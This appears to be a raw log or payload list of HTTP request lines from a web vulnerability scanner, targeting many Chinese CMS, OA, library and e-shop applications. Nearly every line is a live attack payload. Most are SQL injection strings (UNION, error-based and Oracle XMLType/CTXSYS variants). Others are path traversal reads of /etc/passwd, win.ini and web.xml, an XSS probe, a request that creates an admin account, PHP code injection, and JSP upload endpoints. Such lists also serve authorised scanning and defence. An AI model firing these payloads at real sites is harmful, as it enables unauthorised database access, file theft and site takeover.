GET /website/dflz/dflzCjAction!caiwugk_list.action?orgCode=&orgName=&zuOrgCode=&zuOrgName=&cwgkbbh=-21'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--%20&cwgkbmc=
GET /Documents/FolderInfor.asp?POAID=0'%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
GET /Documents/FolderInfor.asp?OAID=0%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
POST /meetingroom/MeetingRoom_UseInfo.asp
GET /lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL--
HEAD /downloadFile.action?path=index.jsp
GET /portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo
GET /lm/front/noontimelist.jsp?flag=a&start=1&end=2&sysid=2'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL%20FROM%20DUAL%20--&groupid=4
POST /php/bill/print_addfeelog.php
GET /objectbox/selectx_userlist.jsp?fn_Keywords=1'%20UNION%20ALL%20SELECT%20NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL--%20&perm=&cPage=1&tiao=
GET /meetingroom/ShenQingInforDis.asp?OAID=-12%20AND%201993%20IN%20(char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100))%20---
GET /information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
GET /information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
GET /message/mytreedata.asp?bumenid=-12%20AND%201432=CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)))--%20&time=&time=
POST /house/upload/upload.asp
POST /sbweb/Upload_Save_2.asp
GET /feReport/chartList.jsp?delId=1&reportId=1%20and%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--
GET /jsearch/admin/opr_forcechangepwd.jsp
GET /home/front/search/opr_chatsearch.jsp?action=simplesearch&words=1%25%27%20union%20all%20select%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20DUAL%20--
POST /celive/live/index.php?action=1
GET /admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager
GET /baseNews_view.jsp?newsId=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--
POST /Lesktop/command.aspx
GET /Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0
POST /Lesktop/sendfile.aspx
GET /Office_Supplies/Goods_Main.aspx?type=1&info_id=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /Personnel/Infomation.aspx?userid=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /Personnel/VacationComputation.aspx?id=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /RCMANAGE_New/rcgl.aspx?UID=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /ObjSwitch/HYTZ.aspx?userid=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20--
GET /jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1%20union%20all%20select%2012,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20from%20dual%20--
GET /lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,md5(1122),0x7e),NULL,NULL,NULL,NULL
GET /lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL%23
GET /jcms/jcms_files/jcms1/web2/site/module/comment/opr_readfile.jsp?filename=opr_readfile.jsp
GET /managerNManager.action
GET /lm/manage/opr_setappraisal.jsp?fn_billstatus=E&vc_setapprid=-2087%20UNION%20ALL%20SELECT%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL%20FROM%20DUAL--
GET /jcms/m_1_9/column/getgroupuser.jsp?jgid=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)%20--&spell=2&webid=3&userid=4
GET /lm/sys/opr_bulletin_show.jsp?vc_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
GET /lm/front/mailpublist.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
GET /jcms/workflow/design/opr_model_class.jsp?fn_billstatus=E&vc_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100),NULL,NULL,NULL%20--
GET /jcms/m_5_5/m_5_5_1/objectbox/selectx_search.jsp?spell=1%25%27%20union%20all%20select%20null%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%20from%20dual%20--
GET /lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL%20--
GET /lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,0x7765627363616E3A693A66696E64,0x7e)%23
GET /lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
GET /admini/question/question.aspx?ID=25'%20and%20char(106)%2bchar(106)%3E0%20--
GET /ModifyNewsAction.do?newsID=-12
GET /plugins/qmail/MailTo.aspx?mail=1%27and%02CHAR(106)%2bCHAR(39)%3E0%02and%02%271%27=%271
POST /manage/Template/DSManage.aspx
GET /index.php?id=product&c=project&cate=1&ext[id%3C0%20union%20select%20111,2,3,4,5,6,md5(1122),8,9%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--]=1
GET /api.php?id=_arclist&c=api&f=phpok&param[pid]=41&param[notin]=41)%20Union%20Select%201,md5(1122),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
GET /admin/admin_adminmodifypwd.aspx
GET /jcms/m_5_6/ajax_printcol.jsp?cataid=1)%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)%20--
GET /feform/createprinttemplete.jsp?formid=1'%20AND%204321=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
GET /fenc/syncsubject.jsp?pk_corp=1'%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
GET /indexsearch/filter.jsp?tableId=1%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
GET /Modules/jycg/SFDB.aspx?sfpjnm=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116),NULL%20--&type=1
GET /print/search_print_proof.jsp?proof_no=just_sql_test'
POST /include/user/mulbumentree.asp
POST /include/user/usertree.asp
GET /include/zidian/dantree.asp?ZiDian='%20AND%204321%3DCONVERT%28INT%2C%28SELECT%20CHAR%28106%29%2bCHAR%28117%29%2bCHAR%28115%29%2bCHAR%28116%29%2bCHAR%2895%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%28115%29%2bCHAR%28116%29%29%29%20--
POST /public/oa_nodebanliren_frm.asp
POST /include/chaxundetail.asp
POST /include/user/bdtreemx.asp
POST /admin/Fileup.aspx?path=notice/upload
GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20UNION%20SELECT%201,2,3,md5%281122%29,5,6,7,8,9%23
GET /inc/guestbook.php?do=guestbook&t=ajax&mid=1&content=testtesta%E9%8C%A6%27,(select%20concat%280x7c,md5%281122%29,0x7c%29from%20job_admin%20limit%201%29,NOW%28%29,1,1,3,1,if%281=2,1,char%28@%60%27%60%29%29%29%23@%60%27%60
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /hlp/help.asp?HlpCode=1'%20and%201=char(106)%20--
GET /Code/Common/SysCommonAttach.aspx?Method=GetNewID&IDs=isTrans&tabRecordId=1%27%20AND%201%3DCHAR%28106%29%20--
GET /ModifyNewsAction.do?newsID=-12'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%20%23
GET /piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23
GET /schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
POST /common/mod/ajax.ashx
GET /SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=-1'%20and%201=char(106)%20--
POST /dakai.aspx
GET /SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=3'%20and%201=char(106)%20--
GET /Permission/Application_Query_List.aspx?deptName=3'%20and%201=char(106)%20--
GET /main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20--
GET /index_page/geren_list_page.aspx?server=1&refid=1'%20AND%201=CHAR(106)%2bCHAR(60)%20--
GET /website/level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29--
GET /varset/modifyTime.asp?varname=&id=495'%20union%20all%20select%201,2,3,0x66696E643A76756C,5,6,7,8,9%20from%20teachers%20--
POST /getpassword.php?do=login
GET /api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw
GET /servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
GET /servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
POST /index.php?m=register&c=ajax_reg
GET /api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg
GET /witapprovemanage/apprvaddNew.jsp?flowid=%27%20and%201=2%20UNION%20SELECT%201,2,3,4,char(106)%2bchar(60),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29;--%20-
GET /nicknamelogin.jsp
GET /jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd
GET /lm/objectbox/selectx_groupuserlist.jsp?vc_parid=-42873%27+or+%271%27=%271
POST /index.php?m=register&c=ajax_reg
GET /inc/ajax.asp?action=videoscore&id=1%20and%201=2%20union%20select%20CHR(106),CHR(99),3%20from%20%7Bpre%7Dmanager
GET /ajaxfs.php?tooltip=5254'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20%23
GET /utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%25%3Cscript%3Eprompt(42873)%3C/script%3E&page=1&action=view_logfile
POST /?q=node&destination=node
GET /UtilServlet?name=-1'%20UNION%20ALL%20SELECT%20NULL,%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)--%20&operation=getUserInfo&time=12
POST /jcms/m_5_e/module/individuation/opr_individuation_unit.jsp?fn_billstatus=B&sub_row=just_test
HEAD /govdiropen/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=..././..././..././..././..././..././WEB-INF/ini/merpserver.ini&webid=1&type=1&downname=just_test.txt
GET /down.aspx?id=(select%20convert(int,(select%20char(106)))%20FROM%20syscolumns)
POST /api/CheckMemberLogin.ashx?type=mobileisexist
GET /comm/showpic.php?pic=aHR0cDovL3d3dy5zby5jb20vcm9ib3RzLnR4dA%3D%3D
POST /LoginCheck.aspx
GET /NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))
GET /index.php?c=api&m=data&auth=finecms&param=action%3Dcache%20name%3DSPACE-MODEL.1%27%5D%3Bprint%28md5%281122%29%29%3B%2f%2f
GET /Book/user_read.jsp?classId=1'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20and%20'at'='at
GET /show.jsp?id=5'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20AND%20'AT'='AT
GET /NTRdrS_RegistInfo.aspx?BookRecno=1'%20AND%209211=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'AT'='AT
GET /NTRdrBookRetrInfo.aspx?BookRecno='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20chr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%20from%20DUAL))%7C%7C'
GET /NTRdrBookRetrInfo.aspx?BookRecno=18273&NewBIBNO=111%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)&NEWBOOK=newbook
GET /NTBookRetrTopShowright.aspx?page=1&Index=6&LocLmt=&SrchTab=3&Acurate=3&Key='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%20from%20DUAL))%7C%7C'&AllName=A++
GET /zfcgFrame/xx_look.aspx?ID=-1%27%20UNION%20ALL%20SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29--%20
GET /AdminP
GET /lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23
HEAD /public/download.asp?filename=../login2.asp/
GET /Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1
GET /index.php?controller=block&action=goodsCommend&id=0)%20Union%20select%201,md5(1122)%23
POST /API/DownloadProducts.ashx
GET /Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=char(106)%20--
GET /ProductUnSales.aspx?keywords=uio%2527&tagIds=1_2))%20T%20WHERE%201=1%20and%201=(select%20char(106)%2bchar(106))%20--%20&pageIndex=1
GET /SubCategory.aspx?TagIds=1%20and%20char(106)%3E1
POST /MShop/Partial/SuppLogo
POST /ShoppingHandler.aspx
HEAD /bq/Data/BIData.zip
GET /jphoto/objectbox/selectx_search.jsp?spell=1%25%27%20UNION%20SELECT%20CHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2899%29%7C%7CCHR%2899%29%2Cnull%20FROM%20DUAL%20--
HEAD /vc/vc/columncount/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
GET /jact/workflow/design/index.jsp?flowcode=a'%20UNION%20ALL%20SELECT%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(107)%7C%7CCHR(109)%7C%7CCHR(108),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
GET /jis/manage/role/opr_approleinfo_user2.jsp?c_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(101)%2bCHAR(102)%2bCHAR(58)%2bCHAR(104)%2bCHAR(103)%2bCHAR(58)%2bCHAR(105),NULL,NULL--%20
POST /cms/voteManager/voteaction.jsp
GET /EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
POST /ShopManage.aspx
GET /RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100)))
POST /SNS/Product/WaterfallProductListData
POST /ProSales/GetListCate
HEAD /jphoto/jphoto/sys/member/opr_export.jsp
POST /JwGl/jxjh/JxjhXGBc.asp
GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
HEAD /defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../index.jsp
GET /defaultroot/public/select_user/search_org_list.jsp?searchName=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x23%2C0x7765627363616E3A693A66696E64%2C0x23%29%2CNULL%23
GET /defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(108)%2bCHAR(109)%2bCHAR(110),NULL,NULL,NULL,NULL,NULL,NULL--
GET /cjcx/xuesheng/czjl/shuru.asp?id=-28%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(100)%2bCHAR(100)%2bCHAR(60)%20--&xueke=
GET /cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
GET /cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
GET /cjcx/kagx/main3.asp?rjxk=dd'%20and%201=(CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))%20--&xqmc=%25&jsxm=&mc=&ktlx=&page=
POST /login.asp
POST /search.php
GET /LoginCheck4.asp?LoginLb=jwc&Account=1'%20AND%201=CHAR(106)%20--&PassWord=0
GET /jwgl/jxjh/jxjha.asp
POST /jwgl/jcxx/savetofile.asp
POST /public/jsp/livephotoupload.jsp?path=archives&mode=add&hiddenName=1.jsp&visualName=2.jsp
GET /Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100))
POST /govezoffice/gov_documentmanager/senddocument_import.jsp?categoryId=1&path=archives&mode=add&fileName=1.jsp&saveName=2.jsp&fileMaxSize=0&fileMaxNum=100&fileType=jsp
